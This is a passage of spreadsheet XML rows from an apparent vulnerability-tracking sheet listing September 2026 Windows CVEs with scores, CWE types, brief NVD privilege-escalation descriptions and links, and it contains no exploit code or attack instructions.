      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr"/>
      <c r="Q305" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R305" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69814</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69816</t>
        </is>
      </c>
      <c r="D306" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F306" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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06" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr"/>
      <c r="Q306" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R306" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69816</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69817</t>
        </is>
      </c>
      <c r="D307" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F307" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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7" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr"/>
      <c r="Q307" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R307" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Port Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69817</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69818</t>
        </is>
      </c>
      <c r="D308" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F308" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K308" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L308" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr"/>
      <c r="Q308" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R308" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69818</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69834</t>
        </is>
      </c>
      <c r="D309" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F309" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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09" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr"/>
      <c r="Q309" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R309" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69834</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69838</t>
        </is>
      </c>
      <c r="D310" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F310" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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0" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr"/>
      <c r="Q310" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R310" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69838</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69859</t>
        </is>
      </c>
      <c r="D311" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K31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1" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr"/>
      <c r="Q311" s="5" t="inlineStr">
        <is>
          <t>CWE-191, CWE-367</t>
        </is>
      </c>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="S311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69859</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69866</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K31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12" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr"/>
      <c r="Q312" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69866</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69889</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K31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13" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr"/>
      <c r="Q313" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R313" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69889</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69891</t>
        </is>
      </c>
      <c r="D314" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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14" s="5" t="inlineStr"/>
      <c r="M314" s="5" t="inlineStr"/>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr"/>
      <c r="Q314" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R314" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Media allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69891</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69896</t>
        </is>
      </c>
      <c r="D315" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F315" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K315" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L315" s="5" t="inlineStr"/>
      <c r="M315" s="5" t="inlineStr"/>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr"/>
      <c r="Q315" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R315" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69896</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69911</t>
        </is>
      </c>
      <c r="D316" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K31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6" s="5" t="inlineStr"/>
      <c r="M316" s="5" t="inlineStr"/>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr"/>
      <c r="Q316" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R316" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69911</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70283</t>
        </is>
      </c>
      <c r="D317" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F317" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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7" s="5" t="inlineStr"/>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr"/>
      <c r="Q317" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R317" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70283</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70562</t>
        </is>
      </c>
      <c r="D318" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F318" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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8" s="5" t="inlineStr"/>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr"/>
      <c r="Q318" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R318" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70562</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70565</t>
        </is>
      </c>
      <c r="D319" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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19" s="5" t="inlineStr"/>
      <c r="M319" s="5" t="inlineStr"/>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr"/>
      <c r="Q319" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R319" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows AF_UNIX Socket Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70565</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70567</t>
        </is>
      </c>
      <c r="D320" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F320" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K320" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L320" s="5" t="inlineStr"/>
      <c r="M320" s="5" t="inlineStr"/>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr"/>
      <c r="Q320" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R320" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Display Enhancement Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70567</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70568</t>
        </is>
      </c>
      <c r="D321" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F321" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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1" s="5" t="inlineStr"/>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr"/>
      <c r="Q321" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R321" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Defender Firewall Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70568</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70573</t>
        </is>
      </c>
      <c r="D322" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F322" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K32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22" s="5" t="inlineStr"/>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr"/>
      <c r="Q322" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R322" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70573</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71332</t>
        </is>
      </c>
      <c r="D323" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F323" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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23" s="5" t="inlineStr"/>
      <c r="M323" s="5" t="inlineStr"/>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr"/>
      <c r="Q323" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R323" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71332</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
